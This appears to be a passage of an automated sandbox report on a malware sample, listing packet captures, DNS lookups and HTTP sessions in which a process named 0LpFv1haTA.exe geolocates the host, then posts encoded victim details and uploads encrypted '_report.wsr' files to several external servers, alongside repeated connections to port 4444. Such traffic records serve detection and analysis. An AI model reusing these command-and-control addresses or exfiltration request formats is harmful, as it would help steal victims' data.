                                                                                                                                                                                                Sep 27, 2024 23:28:00.372188091 CEST497398817192.168.2.5188.120.242.78
                                                                                                                                                                                                Sep 27, 2024 23:28:00.419751883 CEST881749739188.120.242.78192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:00.420730114 CEST497398817192.168.2.5188.120.242.78
                                                                                                                                                                                                Sep 27, 2024 23:28:00.472105026 CEST881749739188.120.242.78192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:00.472613096 CEST497398817192.168.2.5188.120.242.78
                                                                                                                                                                                                Sep 27, 2024 23:28:00.486008883 CEST881749739188.120.242.78192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:00.488729000 CEST497398817192.168.2.5188.120.242.78
                                                                                                                                                                                                Sep 27, 2024 23:28:00.493699074 CEST881749739188.120.242.78192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:00.493741035 CEST881749739188.120.242.78192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:00.493752956 CEST881749739188.120.242.78192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:00.493761063 CEST881749739188.120.242.78192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:00.493788958 CEST881749739188.120.242.78192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:00.493834972 CEST881749739188.120.242.78192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:00.493843079 CEST881749739188.120.242.78192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:00.493860960 CEST881749739188.120.242.78192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:00.493894100 CEST881749739188.120.242.78192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:00.493936062 CEST881749739188.120.242.78192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:00.493942976 CEST881749739188.120.242.78192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:00.493951082 CEST881749739188.120.242.78192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:00.493980885 CEST881749739188.120.242.78192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:00.493988037 CEST881749739188.120.242.78192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:00.494064093 CEST881749739188.120.242.78192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:00.494132042 CEST881749739188.120.242.78192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:00.494244099 CEST881749739188.120.242.78192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:00.494537115 CEST881749739188.120.242.78192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:00.693816900 CEST881749739188.120.242.78192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:00.736823082 CEST497398817192.168.2.5188.120.242.78
                                                                                                                                                                                                Sep 27, 2024 23:28:01.051019907 CEST881749739188.120.242.78192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:01.053888083 CEST49740443192.168.2.5149.154.167.220
                                                                                                                                                                                                Sep 27, 2024 23:28:01.053988934 CEST44349740149.154.167.220192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:01.054075003 CEST49740443192.168.2.5149.154.167.220
                                                                                                                                                                                                Sep 27, 2024 23:28:01.054332972 CEST49740443192.168.2.5149.154.167.220
                                                                                                                                                                                                Sep 27, 2024 23:28:01.054367065 CEST44349740149.154.167.220192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:01.096091032 CEST497398817192.168.2.5188.120.242.78
                                                                                                                                                                                                Sep 27, 2024 23:28:01.669440031 CEST44349740149.154.167.220192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:01.677229881 CEST49740443192.168.2.5149.154.167.220
                                                                                                                                                                                                Sep 27, 2024 23:28:01.677265882 CEST44349740149.154.167.220192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:02.050978899 CEST44349740149.154.167.220192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:02.051032066 CEST44349740149.154.167.220192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:02.051091909 CEST49740443192.168.2.5149.154.167.220
                                                                                                                                                                                                Sep 27, 2024 23:28:02.051455975 CEST49740443192.168.2.5149.154.167.220
                                                                                                                                                                                                Sep 27, 2024 23:28:02.055310011 CEST497398817192.168.2.5188.120.242.78
                                                                                                                                                                                                Sep 27, 2024 23:28:02.055453062 CEST4974180192.168.2.5185.80.128.17
                                                                                                                                                                                                Sep 27, 2024 23:28:02.060625076 CEST8049741185.80.128.17192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:02.060635090 CEST881749739188.120.242.78192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:02.060709953 CEST497398817192.168.2.5188.120.242.78
                                                                                                                                                                                                Sep 27, 2024 23:28:02.060817957 CEST4974180192.168.2.5185.80.128.17
                                                                                                                                                                                                Sep 27, 2024 23:28:02.060817957 CEST4974180192.168.2.5185.80.128.17
                                                                                                                                                                                                Sep 27, 2024 23:28:02.065742016 CEST8049741185.80.128.17192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:02.722192049 CEST8049741185.80.128.17192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:02.722223043 CEST8049741185.80.128.17192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:02.722234011 CEST8049741185.80.128.17192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:02.722295046 CEST4974180192.168.2.5185.80.128.17
                                                                                                                                                                                                Sep 27, 2024 23:28:02.722445011 CEST8049741185.80.128.17192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:02.722455025 CEST8049741185.80.128.17192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:02.722464085 CEST8049741185.80.128.17192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:02.722472906 CEST8049741185.80.128.17192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:02.722516060 CEST4974180192.168.2.5185.80.128.17
                                                                                                                                                                                                Sep 27, 2024 23:28:02.722846985 CEST8049741185.80.128.17192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:02.722856998 CEST8049741185.80.128.17192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:02.722865105 CEST8049741185.80.128.17192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:02.722912073 CEST4974180192.168.2.5185.80.128.17
                                                                                                                                                                                                Sep 27, 2024 23:28:02.728369951 CEST8049741185.80.128.17192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:02.728384972 CEST8049741185.80.128.17192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:02.728430033 CEST4974180192.168.2.5185.80.128.17
                                                                                                                                                                                                Sep 27, 2024 23:28:02.832178116 CEST8049741185.80.128.17192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:02.832190037 CEST8049741185.80.128.17192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:02.832200050 CEST8049741185.80.128.17192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:02.832266092 CEST4974180192.168.2.5185.80.128.17
                                                                                                                                                                                                Sep 27, 2024 23:28:02.832321882 CEST8049741185.80.128.17192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:02.832350016 CEST8049741185.80.128.17192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:02.832387924 CEST4974180192.168.2.5185.80.128.17
                                                                                                                                                                                                Sep 27, 2024 23:28:02.832468987 CEST8049741185.80.128.17192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:02.832478046 CEST8049741185.80.128.17192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:02.832487106 CEST8049741185.80.128.17192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:02.832542896 CEST4974180192.168.2.5185.80.128.17
                                                                                                                                                                                                Sep 27, 2024 23:28:02.832829952 CEST8049741185.80.128.17192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:02.833504915 CEST8049741185.80.128.17192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:02.833513975 CEST8049741185.80.128.17192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:02.833522081 CEST8049741185.80.128.17192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:02.833547115 CEST4974180192.168.2.5185.80.128.17
                                                                                                                                                                                                Sep 27, 2024 23:28:02.833575964 CEST4974180192.168.2.5185.80.128.17
                                                                                                                                                                                                Sep 27, 2024 23:28:02.833672047 CEST8049741185.80.128.17192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:02.833682060 CEST8049741185.80.128.17192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:02.833791971 CEST4974180192.168.2.5185.80.128.17
                                                                                                                                                                                                Sep 27, 2024 23:28:02.834216118 CEST8049741185.80.128.17192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:02.834224939 CEST8049741185.80.128.17192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:02.834237099 CEST8049741185.80.128.17192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:02.834275007 CEST4974180192.168.2.5185.80.128.17
                                                                                                                                                                                                Sep 27, 2024 23:28:02.834340096 CEST8049741185.80.128.17192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:02.834347963 CEST8049741185.80.128.17192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:02.834407091 CEST4974180192.168.2.5185.80.128.17
                                                                                                                                                                                                Sep 27, 2024 23:28:02.835129976 CEST8049741185.80.128.17192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:02.835150003 CEST8049741185.80.128.17192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:02.835160017 CEST8049741185.80.128.17192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:02.835199118 CEST4974180192.168.2.5185.80.128.17
                                                                                                                                                                                                Sep 27, 2024 23:28:02.835248947 CEST4974180192.168.2.5185.80.128.17
                                                                                                                                                                                                Sep 27, 2024 23:28:02.837233067 CEST8049741185.80.128.17192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:02.877316952 CEST4974180192.168.2.5185.80.128.17
                                                                                                                                                                                                Sep 27, 2024 23:28:02.918678999 CEST8049741185.80.128.17192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:02.918756008 CEST8049741185.80.128.17192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:02.918812990 CEST4974180192.168.2.5185.80.128.17
                                                                                                                                                                                                Sep 27, 2024 23:28:02.941678047 CEST8049741185.80.128.17192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:02.941737890 CEST8049741185.80.128.17192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:02.941745996 CEST8049741185.80.128.17192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:02.941828012 CEST4974180192.168.2.5185.80.128.17
                                                                                                                                                                                                Sep 27, 2024 23:28:02.941867113 CEST8049741185.80.128.17192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:02.941875935 CEST8049741185.80.128.17192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:02.941884995 CEST8049741185.80.128.17192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:02.941894054 CEST8049741185.80.128.17192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:02.941936016 CEST4974180192.168.2.5185.80.128.17
                                                                                                                                                                                                Sep 27, 2024 23:28:02.941936970 CEST4974180192.168.2.5185.80.128.17
                                                                                                                                                                                                Sep 27, 2024 23:28:02.942359924 CEST8049741185.80.128.17192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:02.944741964 CEST4974180192.168.2.5185.80.128.17
                                                                                                                                                                                                Sep 27, 2024 23:28:03.006726027 CEST8049741185.80.128.17192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:03.049202919 CEST4974180192.168.2.5185.80.128.17
                                                                                                                                                                                                Sep 27, 2024 23:28:03.236769915 CEST4974180192.168.2.5185.80.128.17
                                                                                                                                                                                                Sep 27, 2024 23:28:03.239731073 CEST497438080192.168.2.5185.253.7.60
                                                                                                                                                                                                Sep 27, 2024 23:28:03.242060900 CEST8049741185.80.128.17192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:03.242322922 CEST4974180192.168.2.5185.80.128.17
                                                                                                                                                                                                Sep 27, 2024 23:28:03.244649887 CEST808049743185.253.7.60192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:03.244710922 CEST497438080192.168.2.5185.253.7.60
                                                                                                                                                                                                Sep 27, 2024 23:28:03.244808912 CEST497438080192.168.2.5185.253.7.60
                                                                                                                                                                                                Sep 27, 2024 23:28:03.249639034 CEST808049743185.253.7.60192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:11.515019894 CEST497444444192.168.2.5193.149.187.135
                                                                                                                                                                                                Sep 27, 2024 23:28:11.519928932 CEST444449744193.149.187.135192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:11.520041943 CEST497444444192.168.2.5193.149.187.135
                                                                                                                                                                                                Sep 27, 2024 23:28:24.599967003 CEST808049743185.253.7.60192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:24.600109100 CEST497438080192.168.2.5185.253.7.60
                                                                                                                                                                                                Sep 27, 2024 23:28:24.600270987 CEST497438080192.168.2.5185.253.7.60
                                                                                                                                                                                                Sep 27, 2024 23:28:24.600794077 CEST497468080192.168.2.5185.253.7.60
                                                                                                                                                                                                Sep 27, 2024 23:28:24.605009079 CEST808049743185.253.7.60192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:24.605703115 CEST808049746185.253.7.60192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:24.605778933 CEST497468080192.168.2.5185.253.7.60
                                                                                                                                                                                                Sep 27, 2024 23:28:24.605931044 CEST497468080192.168.2.5185.253.7.60
                                                                                                                                                                                                Sep 27, 2024 23:28:24.611044884 CEST808049746185.253.7.60192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:32.943758011 CEST444449744193.149.187.135192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:32.946409941 CEST497444444192.168.2.5193.149.187.135
                                                                                                                                                                                                Sep 27, 2024 23:28:42.942378998 CEST497474444192.168.2.5193.149.187.135
                                                                                                                                                                                                Sep 27, 2024 23:28:42.948055029 CEST444449747193.149.187.135192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:42.948199987 CEST497474444192.168.2.5193.149.187.135
                                                                                                                                                                                                Sep 27, 2024 23:28:46.010441065 CEST808049746185.253.7.60192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:46.010524035 CEST497468080192.168.2.5185.253.7.60
                                                                                                                                                                                                Sep 27, 2024 23:28:46.010715008 CEST497468080192.168.2.5185.253.7.60
                                                                                                                                                                                                Sep 27, 2024 23:28:46.017095089 CEST808049746185.253.7.60192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:29:04.349087954 CEST444449747193.149.187.135192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:29:04.349162102 CEST497474444192.168.2.5193.149.187.135
                                                                                                                                                                                                Sep 27, 2024 23:29:14.363740921 CEST497494444192.168.2.5193.149.187.135
                                                                                                                                                                                                Sep 27, 2024 23:29:14.368688107 CEST444449749193.149.187.135192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:29:14.368756056 CEST497494444192.168.2.5193.149.187.135
                                                                                                                                                                                                Sep 27, 2024 23:29:23.114434958 CEST4970722192.168.2.5138.68.79.95
                                                                                                                                                                                                Sep 27, 2024 23:29:23.119504929 CEST2249707138.68.79.95192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:29:23.310367107 CEST2249707138.68.79.95192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:29:23.334816933 CEST4970722192.168.2.5138.68.79.95
                                                                                                                                                                                                Sep 27, 2024 23:29:23.350466967 CEST2249707138.68.79.95192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:29:28.122944117 CEST4971022192.168.2.5138.68.79.95
                                                                                                                                                                                                Sep 27, 2024 23:29:28.129625082 CEST2249710138.68.79.95192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:29:28.319207907 CEST2249710138.68.79.95192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:29:28.424299955 CEST4971022192.168.2.5138.68.79.95
                                                                                                                                                                                                Sep 27, 2024 23:29:28.733001947 CEST4971022192.168.2.5138.68.79.95
                                                                                                                                                                                                Sep 27, 2024 23:29:28.738292933 CEST2249710138.68.79.95192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:29:35.744723082 CEST444449749193.149.187.135192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:29:35.744843960 CEST497494444192.168.2.5193.149.187.135
                                                                                                                                                                                                Sep 27, 2024 23:29:45.800750971 CEST497504444192.168.2.5193.149.187.135
                                                                                                                                                                                                Sep 27, 2024 23:29:45.805838108 CEST444449750193.149.187.135192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:29:45.808540106 CEST497504444192.168.2.5193.149.187.135
                                                                                                                                                                                                Sep 27, 2024 23:30:07.180864096 CEST444449750193.149.187.135192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:30:07.180938959 CEST497504444192.168.2.5193.149.187.135
                                                                                                                                                                                                Sep 27, 2024 23:30:17.174870014 CEST497524444192.168.2.5193.149.187.135
                                                                                                                                                                                                Sep 27, 2024 23:30:17.179833889 CEST444449752193.149.187.135192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:30:17.179929018 CEST497524444192.168.2.5193.149.187.135
                                                                                                                                                                                                Sep 27, 2024 23:30:38.538777113 CEST444449752193.149.187.135192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:30:38.540613890 CEST497524444192.168.2.5193.149.187.135
                                                                                                                                                                                                Sep 27, 2024 23:30:48.534928083 CEST497534444192.168.2.5193.149.187.135
                                                                                                                                                                                                Sep 27, 2024 23:30:48.540091038 CEST444449753193.149.187.135192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:30:48.540193081 CEST497534444192.168.2.5193.149.187.135
                                                                                                                                                                                                Sep 27, 2024 23:31:09.966017008 CEST444449753193.149.187.135192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:31:09.966083050 CEST497534444192.168.2.5193.149.187.135
                                                                                                                                                                                                Sep 27, 2024 23:31:20.658968925 CEST497554444192.168.2.5193.149.187.135
                                                                                                                                                                                                Sep 27, 2024 23:31:20.669645071 CEST444449755193.149.187.135192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:31:20.669707060 CEST497554444192.168.2.5193.149.187.135

                                                                                                                                                                                                UDP Packets

                                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                Sep 27, 2024 23:27:13.284852028 CEST6147153192.168.2.51.1.1.1
                                                                                                                                                                                                Sep 27, 2024 23:27:13.293793917 CEST53614711.1.1.1192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:14.412930012 CEST5581753192.168.2.51.1.1.1
                                                                                                                                                                                                Sep 27, 2024 23:27:14.436815023 CEST53558171.1.1.1192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:16.568922997 CEST5152653192.168.2.51.1.1.1
                                                                                                                                                                                                Sep 27, 2024 23:27:16.575623035 CEST53515261.1.1.1192.168.2.5

                                                                                                                                                                                                DNS Queries

                                                                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                Sep 27, 2024 23:27:13.284852028 CEST192.168.2.51.1.1.10x76aeStandard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                Sep 27, 2024 23:27:14.412930012 CEST192.168.2.51.1.1.10x502fStandard query (0)serveo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                Sep 27, 2024 23:27:16.568922997 CEST192.168.2.51.1.1.10xa34eStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                                                                                                                                                                DNS Answers

                                                                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                Sep 27, 2024 23:27:13.293793917 CEST1.1.1.1192.168.2.50x76aeNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                Sep 27, 2024 23:27:14.436815023 CEST1.1.1.1192.168.2.50x502fNo error (0)serveo.net138.68.79.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                Sep 27, 2024 23:27:16.575623035 CEST1.1.1.1192.168.2.50xa34eNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                                                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                                                                                • api.telegram.org
                                                                                                                                                                                                • ip-api.com
                                                                                                                                                                                                • 185.253.7.60:8080
                                                                                                                                                                                                • 185.80.128.17

                                                                                                                                                                                                HTTP Packets

                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                0192.168.2.549706208.95.112.1801964C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Sep 27, 2024 23:27:13.307378054 CEST85OUTGET /line?fields=query,country HTTP/1.1
                                                                                                                                                                                                Host: ip-api.com
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Sep 27, 2024 23:27:13.791929960 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 27 Sep 2024 21:27:13 GMT
                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                Content-Length: 26
                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                X-Ttl: 60
                                                                                                                                                                                                X-Rl: 44
                                                                                                                                                                                                Data Raw: 55 6e 69 74 65 64 20 53 74 61 74 65 73 0a 38 2e 34 36 2e 31 32 33 2e 33 33 0a
                                                                                                                                                                                                Data Ascii: United States8.46.123.33


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                1192.168.2.549708185.253.7.6080801964C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Sep 27, 2024 23:27:14.504254103 CEST251OUTPOST //sendData?pk=MDM2MDQ3RTJFN0NDMTE4MjQzNkMzMUU0NEE4Nzg4QUU=&ta=TVNXSU5ET1c=&un=YWxmb25z&pc=MDUxODI5&co=VW5pdGVkIFN0YXRlcw==&wa=MA==&be=MQ== HTTP/1.1
                                                                                                                                                                                                Host: 185.253.7.60:8080
                                                                                                                                                                                                Content-Length: 135595
                                                                                                                                                                                                Expect: 100-continue
                                                                                                                                                                                                Connection: Keep-Alive


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                2192.168.2.549709208.95.112.1805500C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Sep 27, 2024 23:27:14.926947117 CEST85OUTGET /line?fields=query,country HTTP/1.1
                                                                                                                                                                                                Host: ip-api.com
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Sep 27, 2024 23:27:15.409276962 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 27 Sep 2024 21:27:15 GMT
                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                Content-Length: 26
                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                X-Ttl: 58
                                                                                                                                                                                                X-Rl: 43
                                                                                                                                                                                                Data Raw: 55 6e 69 74 65 64 20 53 74 61 74 65 73 0a 38 2e 34 36 2e 31 32 33 2e 33 33 0a
                                                                                                                                                                                                Data Ascii: United States8.46.123.33


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                3192.168.2.549711185.253.7.6080805500C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Sep 27, 2024 23:27:15.897093058 CEST251OUTPOST //sendData?pk=MDM2MDQ3RTJFN0NDMTE4MjQzNkMzMUU0NEE4Nzg4QUU=&ta=TVNXSU5ET1c=&un=YWxmb25z&pc=MDUxODI5&co=VW5pdGVkIFN0YXRlcw==&wa=MA==&be=MQ== HTTP/1.1
                                                                                                                                                                                                Host: 185.253.7.60:8080
                                                                                                                                                                                                Content-Length: 140694
                                                                                                                                                                                                Expect: 100-continue
                                                                                                                                                                                                Connection: Keep-Alive


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                4192.168.2.549729167.99.138.24980801964C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Sep 27, 2024 23:27:36.837954998 CEST147OUTPUT /9IYTn_user%40051829_report.wsr HTTP/1.1
                                                                                                                                                                                                Host: 167.99.138.249:8080
                                                                                                                                                                                                Content-Length: 135595
                                                                                                                                                                                                Expect: 100-continue
                                                                                                                                                                                                Connection: Keep-Alive


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                5192.168.2.549735167.99.138.24980805500C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Sep 27, 2024 23:27:42.170727015 CEST147OUTPUT /K7IvH_user%40051829_report.wsr HTTP/1.1
                                                                                                                                                                                                Host: 167.99.138.249:8080
                                                                                                                                                                                                Content-Length: 140694
                                                                                                                                                                                                Expect: 100-continue
                                                                                                                                                                                                Connection: Keep-Alive


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                6192.168.2.549737206.189.109.146801964C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Sep 27, 2024 23:27:58.216078997 CEST143OUTPUT /9IYTn_user%40051829_report.wsr HTTP/1.1
                                                                                                                                                                                                Host: 206.189.109.146
                                                                                                                                                                                                Content-Length: 135595
                                                                                                                                                                                                Expect: 100-continue
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Sep 27, 2024 23:27:58.565079927 CEST12360OUTData Raw: 57 53 52 24 1c 79 61 c6 46 bc d2 4e f5 e5 76 24 fe 33 be 62 71 d0 c8 da c1 1a 03 58 d4 dd c6 9d 3e b6 a0 3e af fd d4 97 e3 d7 9b 53 31 15 34 6c 34 16 50 6e 1b e8 51 cc f9 ce 6e 8f 3c 04 26 38 47 6c e0 47 d1 19 94 3b 75 d8 c2 ec e0 f6 eb 72 45 1d
                                                                                                                                                                                                Data Ascii: WSR$yaFNv$3bqX>>S14l4PnQn<&8GlG;urEPznzqAU9U?81+lZznP%|y}S40:NMhO{:i=*m3]\uhUnYY6v[1)'yq
                                                                                                                                                                                                Sep 27, 2024 23:27:58.570271969 CEST2472OUTData Raw: a2 a1 fe 2e 3f e0 b2 c4 15 06 d2 8b 5e d1 d1 22 d2 c8 ac a2 c9 e0 f9 f7 92 97 aa db a9 44 2e 70 66 94 db 44 d0 84 59 a2 69 6b 70 40 cc 61 32 02 a8 09 51 f9 c8 00 56 ba 52 47 80 ab b9 46 14 2f 85 dd cb ef d6 be 3d 66 8e 1c 5f 57 57 ab bd 5c 73 4b
                                                                                                                                                                                                Data Ascii: .?^"D.pfDYikp@a2QVRGF/=f_WW\sK6i0.,bw4GCZ]R4yoPi15B9} iO4U?ISxHI$~s6qK9~9S"<'bPp{77:h$DMaNX$"Y*
                                                                                                                                                                                                Sep 27, 2024 23:27:58.570318937 CEST7416OUTData Raw: 33 72 74 09 b2 e9 04 81 98 8b 94 0d e5 dd df ca 9e 78 0a e3 b6 40 0c 5e 65 c2 d6 f9 08 2c fa 83 41 12 e2 d9 9c 52 46 a0 01 df eb 19 ac 06 10 1f fc a4 e3 bc 85 c2 00 77 91 ff bd 38 f2 e0 1c e1 67 d5 5e 72 f5 2e 2c 54 2a bd ad 42 d5 3c d3 ff 51 db
                                                                                                                                                                                                Data Ascii: 3rtx@^e,ARFw8g^r.,T*B<Q%c[Xmh0#;`?n Cz>wg(jkO1A\C+!]e!$`?mqq\Q6Q_p]ROf^{}=TwoL*p71tyBmIL
                                                                                                                                                                                                Sep 27, 2024 23:27:58.570353031 CEST2472OUTData Raw: 30 ce 79 f7 02 a6 14 55 ef 1c 7a c5 70 69 a4 e9 da 0b 0e 16 cc 6a 42 d1 8f 8f de 0f 08 85 1e 35 90 3d d4 fb 9c 36 0b ab 79 96 88 53 b2 1d c4 77 52 f6 86 75 44 4a 16 58 90 b4 fd a0 06 6f 67 52 de 67 6c 7b 61 fa 1b a0 52 da 64 e3 21 2c 45 03 22 91
                                                                                                                                                                                                Data Ascii: 0yUzpijB5=6ySwRuDJXogRgl{aRd!,E"LTU9"^3%kn.`n+6kJ"SNz(tw#FP (Tb^NZwcI'Y2afk%:U`j\.M8:
